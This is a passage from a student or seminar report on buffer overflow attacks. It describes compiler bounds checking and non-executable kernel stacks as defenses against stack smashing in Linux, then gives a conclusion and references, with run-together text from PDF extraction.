The main disadvantage to this approach is that all dangerous functionswould suffer a significant performance penalty, and like the previous ap-proach, this modification does not take into account autonomous functionsdefined by the programmer, because of its implementation in the system li-braries. An additional drawback to this approach is that the code necessaryin checking the stack must be written in assembler, and is thus not portableto multiple architectures.

An extreme approach to solving the problem with the compiler involves im-plementing bounds checking in the C programming language. Possibly themost dangerous solution to the stack smashing problem, as this approachviolates C programming language’s simplicity, efficiency, and flexibility de-vices. One approach used in implementing this involves modifying the rep-resentation of pointers in the language to include three items: the pointeritself, and the lower and upper bounds of the pointer’s address space.

21


By giving the compiler the additional upper and lower bound information,it would then be trivial to do bounds checking before byte copy functions.Despite this benefit, using this approach to implementing bounds checkinghas the following disadvantages: execution time of resulting code increasesby a factor of ten or more[5], register allocation becomes more expensive bya factor of 3:1, new versions of all compiled system libraries and system callsmust be provided, and code that interfaces with the hardware directly maybe completely incompatible or require special attention.

A unique approach to modifying the compiler in this manner involved mod-ifying the compiler to perform the same type of bounds checking, withoutmodifying the representation of pointers. Furthermore, there shall be op-tions to turn the bounds checking mode on or off in a given program.

Only one pointer is valid for a given region and one can check whether apointer arithmetic expression is valid by finding its base pointer’s storageregion. This is checked again to insure that the expression’s result points tothe same storage region.

Despite semifavorable performance statistics, in addition to the general riskinvolved at modifying the C language at this level, this modification involvespatching and recompiling the existing C compiler and its libraries. Further-more, all previously compiled binaries must be deleted and recompiled withthe new libraries. Once this is done, all binaries on the system will executewith respect to this patch. In conclusion, modifying the C language or the Ccompiler to limit stack smashing opportunities often involves modifying theC language at a nontrivial level.

Additionally, the most complex and comprehensive solutions of this nature,despite their long term centralization, still remain largely decentralized anddifficult to implement and test in a reasonable amount of time. The moretrivial modifications of this nature degenerate simply into compiler warningmessages that can only encourage the programmer to modify the programmanually.

CPU/OS kernel stack execution privilege

The most centralized approach in preventing some stack smashing vulner-abilities involves modifying an operating system’s kernel segment limit suchthat it does not cover the actual stack space. This approach effectively re-moves the kernel’s stack execution permission. This has a fundamental ad-vantages over other countermeasures. As the most centralized method inlimiting stack smashing vulnerabilities, no recompilation of C libraries orthe actual compiler would be necessary, only the operating system kernelneed be recompiled. A practical implementation of this concept on the Linuxoperating system is described below, this description touches on the detailsof implementation as well as some of the problems.

To remove stack execution privilege in Linux, the operating systemdynamic memory allocation stack of the operating system is marked asnonexecutable.

Started under such a kernel would have its stack pages also marked non-executable. Stack smashing exploits depend on an executable stack whenreturning back into a memory address which executes an interactive shell.By removing this functionality from the system, some stack smashing vul-nerabilities can be stopped.

Furthermore, signal handler returns in the Linux operating system requirean executable stack. Signal handlers are absolutely crucial in an operatingsystem, thus, a temporary executable stack for signal handlers must be im-plemented. Thus, buffer overflows in signal handlers would still be possibleusing this temporarily executable stack.

22


By changing the kernel stack execution permissions, it would stop mostSUID buffer overflows, excluding those involving signal handlers. A systemwith a nonexecutable stack also hinders LISP and Objective C developmentefforts as well as other functional languages might also be affected. Further-more, every program contains code that performs fundamental operationssuch as saving and restoring values from CPU registers, performs systemcalls.

In contrast to the formulated stack smashing exploits available, an attacksuch as this would be impossible to prevent by changing the stack execu-tion privilege. In other words, removing the stack execution permission onlyprevents today’s stack smashing exploits from working properly. As exploitsbecome more sophisticated, stack execution bits may have little or no rel-evance in terms of the exploit. As an aside, this type of patch can also beimplemented in system CPU hardware.

New system architectures could simply have multiple stacks: one for callframes, and one for automatic storage. In conclusion, by removing stack ex-ecution from the system kernel, one can attempt to stop the stack smashingproblem at the source. However, this approach suffers in implementation be-cause the necessary code is nonportable, standard compiler functions andoperating system signal handling behavior is modified and may be unpre-dictable. In addition to these points, this approach is not proven to stopmore sophisticated stack smashing exploits.

23


24

Chapter 6. Conclusion

Stack smashing security exploits have become commonplace on Linux ma-chines as a means to gain access to privileged resources. By combining stan-dard operations and conditions of the Linux and C programming language,based on this study, one can see how an unprivileged user can obtain priv-ileged user permissions. Furthermore, with the number of privileged pro-grams that exist in today’s standard Linux distributions combined with thefact that an overflow exploit could be constructed for any one or number ofthese operating systems.

In spite of stack smashing prevalence, a number of things can be done to pre-vent most stack smashing vulnerabilities. As the level of awareness of stacksmashing exploits increases, Linux vendors, programmers, system adminis-trators and users alike, are educating each other. System administrators canimplement various configuration methods to lower the possibilities of stacksmashing vulnerability exploits. Linux vendors can do their part by making acommitment to be very cautious with privileged binaries installed by defaulton their specific Linux distribution.

Lastly but perhaps the most effective solution can come from programmerswho write privileged code. As standards evolve and are accepted for codingsafer privileged programs and creating more secure operating systems, pro-grammers can develop more robust code which is less susceptible to stacksmashing. With the cooperation of many people in different parts of the Linuxcommunity, stack smashing security vulnerabilities can be defeated.

25

Chapter 6. Conclusion

26

Appendix A. References

• PC Assembly Book by Paul A. Carter

• Smashing the stack for fun and profit by Aleph, Phrack Magazine

• Microprocessors and Interfacing -Programming and Hardware by DouglasV. Hall

27

Appendix A. References

28

buffer overﬂow attack - 123seminarsonly.com · 2012. 12. 20. · chapter 2. what’s a buffer...

Documents